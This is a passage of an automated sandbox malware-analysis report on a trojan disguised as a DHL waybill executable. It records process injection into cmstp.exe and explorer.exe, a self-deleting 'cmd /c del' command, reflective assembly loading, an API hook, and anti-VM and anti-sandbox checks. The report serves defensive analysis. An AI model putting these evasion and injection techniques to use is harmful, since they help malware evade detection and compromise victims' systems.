          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_04772D07
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046BD5E0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046D2581
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046C6E30
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_04772EF7
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_047722AE
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_04772B28
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_04771FF1
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_0476DBD2
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046DEBB0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_0062E85D
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_0062EBC3
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_0062EBC6
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_00612D8C
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_00612D90
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_00619E60
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_00612FB0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: String function: 046AB150 appears 35 times
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeCode function: 5_2_0041A360 NtCreateFile,
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeCode function: 5_2_0041A410 NtReadFile,
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeCode function: 5_2_0041A490 NtClose,
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeCode function: 5_2_0041A540 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeCode function: 5_2_0041A35A NtCreateFile,
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeCode function: 5_2_0041A40A NtReadFile,
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeCode function: 5_2_0041A48A NtClose,
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeCode function: 5_2_0041A542 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046E9860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046E9840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046E9540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046E9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046E95D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046E99A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046E9660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046E9650 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046E9A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046E96E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046E96D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046E9710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046E9FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046E9780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046EB040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046E9820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046E98F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046E98A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046E9560 NtWriteFile,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046E9950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046E9520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046EAD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046E95F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046E99D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046E9670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046E9A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046E9A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046E9610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046E9A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046E9A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046E9760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046E9770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046EA770 NtOpenThread,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046E9730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046E9B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046EA710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046E97A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046EA3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_0062A360 NtCreateFile,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_0062A410 NtReadFile,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_0062A490 NtClose,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_0062A540 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_0062A35A NtCreateFile,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_0062A40A NtReadFile,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_0062A48A NtClose,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_0062A542 NtAllocateVirtualMemory,
          Source: DHL WB# 2343640950.exe, 00000000.00000002.420496255.000000000035C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameFixupD.exe@ vs DHL WB# 2343640950.exe
          Source: DHL WB# 2343640950.exe, 00000000.00000002.425718736.0000000003980000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameIVectorView.dllN vs DHL WB# 2343640950.exe
          Source: DHL WB# 2343640950.exe, 00000000.00000002.428458566.0000000006FD0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameIVectorView.dllN vs DHL WB# 2343640950.exe
          Source: DHL WB# 2343640950.exe, 00000004.00000000.409784167.000000000031C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameFixupD.exe@ vs DHL WB# 2343640950.exe
          Source: DHL WB# 2343640950.exe, 00000005.00000000.414092644.0000000000E2C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameFixupD.exe@ vs DHL WB# 2343640950.exe
          Source: DHL WB# 2343640950.exe, 00000005.00000002.511874001.0000000001B1F000.00000040.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs DHL WB# 2343640950.exe
          Source: DHL WB# 2343640950.exe, 00000005.00000003.421990942.00000000017FB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs DHL WB# 2343640950.exe
          Source: DHL WB# 2343640950.exe, 00000005.00000003.418819728.0000000001654000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs DHL WB# 2343640950.exe
          Source: DHL WB# 2343640950.exe, 00000005.00000002.512345140.0000000003740000.00000040.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameCMSTP.EXE` vs DHL WB# 2343640950.exe
          Source: DHL WB# 2343640950.exe, 00000005.00000002.510678175.000000000198F000.00000040.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs DHL WB# 2343640950.exe
          Source: DHL WB# 2343640950.exeBinary or memory string: OriginalFilenameFixupD.exe@ vs DHL WB# 2343640950.exe
          Source: DHL WB# 2343640950.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: DHL WB# 2343640950.exeVirustotal: Detection: 47%
          Source: DHL WB# 2343640950.exeReversingLabs: Detection: 21%
          Source: DHL WB# 2343640950.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknownProcess created: C:\Users\user\Desktop\DHL WB# 2343640950.exe "C:\Users\user\Desktop\DHL WB# 2343640950.exe"
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeProcess created: C:\Users\user\Desktop\DHL WB# 2343640950.exe C:\Users\user\Desktop\DHL WB# 2343640950.exe
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeProcess created: C:\Users\user\Desktop\DHL WB# 2343640950.exe C:\Users\user\Desktop\DHL WB# 2343640950.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\cmstp.exe C:\Windows\SysWOW64\cmstp.exe
          Source: C:\Windows\SysWOW64\cmstp.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\DHL WB# 2343640950.exe"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeProcess created: C:\Users\user\Desktop\DHL WB# 2343640950.exe C:\Users\user\Desktop\DHL WB# 2343640950.exe
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeProcess created: C:\Users\user\Desktop\DHL WB# 2343640950.exe C:\Users\user\Desktop\DHL WB# 2343640950.exe
          Source: C:\Windows\SysWOW64\cmstp.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\DHL WB# 2343640950.exe"
          Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{317D06E8-5F24-433D-BDF7-79CE68D8ABC2}\InProcServer32
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\DHL WB# 2343640950.exe.logJump to behavior
          Source: classification engineClassification label: mal100.troj.evad.winEXE@9/1@1/1
          Source: DHL WB# 2343640950.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3844:120:WilError_01
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: DHL WB# 2343640950.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: DHL WB# 2343640950.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: cmstp.pdbGCTL source: DHL WB# 2343640950.exe, 00000005.00000002.512345140.0000000003740000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: DHL WB# 2343640950.exe, 00000005.00000002.509487219.0000000001870000.00000040.00000800.00020000.00000000.sdmp, DHL WB# 2343640950.exe, 00000005.00000003.418665497.000000000153E000.00000004.00000800.00020000.00000000.sdmp, DHL WB# 2343640950.exe, 00000005.00000002.510678175.000000000198F000.00000040.00000800.00020000.00000000.sdmp, DHL WB# 2343640950.exe, 00000005.00000003.421562441.00000000016DC000.00000004.00000800.00020000.00000000.sdmp, cmstp.exe, 0000000D.00000003.510313145.0000000000EED000.00000004.00000800.00020000.00000000.sdmp, cmstp.exe, 0000000D.00000003.508015747.0000000000D46000.00000004.00000800.00020000.00000000.sdmp, cmstp.exe, 0000000D.00000002.642289231.0000000004680000.00000040.00000800.00020000.00000000.sdmp, cmstp.exe, 0000000D.00000002.642488316.000000000479F000.00000040.00000800.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: DHL WB# 2343640950.exe, 00000005.00000002.509487219.0000000001870000.00000040.00000800.00020000.00000000.sdmp, DHL WB# 2343640950.exe, 00000005.00000003.418665497.000000000153E000.00000004.00000800.00020000.00000000.sdmp, DHL WB# 2343640950.exe, 00000005.00000002.510678175.000000000198F000.00000040.00000800.00020000.00000000.sdmp, DHL WB# 2343640950.exe, 00000005.00000003.421562441.00000000016DC000.00000004.00000800.00020000.00000000.sdmp, cmstp.exe, cmstp.exe, 0000000D.00000003.510313145.0000000000EED000.00000004.00000800.00020000.00000000.sdmp, cmstp.exe, 0000000D.00000003.508015747.0000000000D46000.00000004.00000800.00020000.00000000.sdmp, cmstp.exe, 0000000D.00000002.642289231.0000000004680000.00000040.00000800.00020000.00000000.sdmp, cmstp.exe, 0000000D.00000002.642488316.000000000479F000.00000040.00000800.00020000.00000000.sdmp
          Source: Binary string: cmstp.pdb source: DHL WB# 2343640950.exe, 00000005.00000002.512345140.0000000003740000.00000040.10000000.00040000.00000000.sdmp

          Data Obfuscation

          barindex
          Source: DHL WB# 2343640950.exe, GothicCheckers/Form1.cs.Net Code: EventSlim System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 0.0.DHL WB# 2343640950.exe.2b0000.0.unpack, GothicCheckers/Form1.cs.Net Code: EventSlim System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 0.2.DHL WB# 2343640950.exe.2b0000.0.unpack, GothicCheckers/Form1.cs.Net Code: EventSlim System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 4.0.DHL WB# 2343640950.exe.270000.2.unpack, GothicCheckers/Form1.cs.Net Code: EventSlim System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 4.2.DHL WB# 2343640950.exe.270000.0.unpack, GothicCheckers/Form1.cs.Net Code: EventSlim System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 4.0.DHL WB# 2343640950.exe.270000.1.unpack, GothicCheckers/Form1.cs.Net Code: EventSlim System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 4.0.DHL WB# 2343640950.exe.270000.3.unpack, GothicCheckers/Form1.cs.Net Code: EventSlim System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 4.0.DHL WB# 2343640950.exe.270000.0.unpack, GothicCheckers/Form1.cs.Net Code: EventSlim System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 5.0.DHL WB# 2343640950.exe.d80000.3.unpack, GothicCheckers/Form1.cs.Net Code: EventSlim System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 5.0.DHL WB# 2343640950.exe.d80000.7.unpack, GothicCheckers/Form1.cs.Net Code: EventSlim System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 5.0.DHL WB# 2343640950.exe.d80000.2.unpack, GothicCheckers/Form1.cs.Net Code: EventSlim System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 5.0.DHL WB# 2343640950.exe.d80000.9.unpack, GothicCheckers/Form1.cs.Net Code: EventSlim System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 5.2.DHL WB# 2343640950.exe.d80000.1.unpack, GothicCheckers/Form1.cs.Net Code: EventSlim System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeCode function: 0_2_0257F162 pushfd ; iretd
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeCode function: 0_2_0257F160 pushad ; iretd
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeCode function: 5_2_0041EA33 push cs; ret
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeCode function: 5_2_00405AC2 push ecx; retf
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeCode function: 5_2_004172E0 push FFFFFF83h; ret
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeCode function: 5_2_0040E3AF push cs; retf
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeCode function: 5_2_0041E461 push dword ptr [BC323EF3h]; ret
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeCode function: 5_2_0041D4B5 push eax; ret
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeCode function: 5_2_0041D56C push eax; ret
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeCode function: 5_2_0041D502 push eax; ret
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeCode function: 5_2_0041D50B push eax; ret
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeCode function: 5_2_0040C6BA push ecx; retf
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046FD0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_0062EA33 push cs; ret
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_006272E0 push FFFFFF83h; ret
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_00615AC2 push ecx; retf
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_0061E3AF push cs; retf
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_0062E4A3 push dword ptr [BC323EF3h]; ret
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_0062D4B5 push eax; ret
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_0062D56C push eax; ret
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_0062D502 push eax; ret
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_0062D50B push eax; ret
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_0062DED8 push ss; ret
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_0062DEB0 push esi; retf
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_0061C6BA push ecx; retf
          Source: initial sampleStatic PE information: section name: .text entropy: 7.85849718872

          Hooking and other Techniques for Hiding and Protection

          barindex
          Source: C:\Windows\SysWOW64\cmstp.exeProcess created: /c del "C:\Users\user\Desktop\DHL WB# 2343640950.exe"
          Source: C:\Windows\SysWOW64\cmstp.exeProcess created: /c del "C:\Users\user\Desktop\DHL WB# 2343640950.exe"
          Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x80 0x0E 0xED
          Source: C:\Windows\explorer.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmstp.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          barindex
          Source: Yara matchFile source: 00000000.00000002.423321322.0000000002797000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: DHL WB# 2343640950.exe PID: 7048, type: MEMORYSTR
          Source: DHL WB# 2343640950.exe, 00000000.00000002.423321322.0000000002797000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
          Source: DHL WB# 2343640950.exe, 00000000.00000002.423321322.0000000002797000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeRDTSC instruction interceptor: First address: 0000000000409904 second address: 000000000040990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeRDTSC instruction interceptor: First address: 0000000000409B7E second address: 0000000000409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cmstp.exeRDTSC instruction interceptor: First address: 0000000000619904 second address: 000000000061990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cmstp.exeRDTSC instruction interceptor: First address: 0000000000619B7E second address: 0000000000619B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exe TID: 7052Thread sleep time: -43731s >= -30000s
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exe TID: 7100Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\SysWOW64\cmstp.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeCode function: 0_2_002BB65D rdtsc
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\cmstp.exeAPI coverage: 9.7 %
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeThread delayed: delay time: 43731
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeThread delayed: delay time: 922337203685477
          Source: DHL WB# 2343640950.exe, 00000000.00000002.423321322.0000000002797000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: explorer.exe, 00000008.00000000.434497528.0000000007FBD000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: DHL WB# 2343640950.exe, 00000000.00000002.423321322.0000000002797000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
          Source: explorer.exe, 00000008.00000000.434708210.000000000807C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
          Source: explorer.exe, 00000008.00000000.434497528.0000000007FBD000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}d
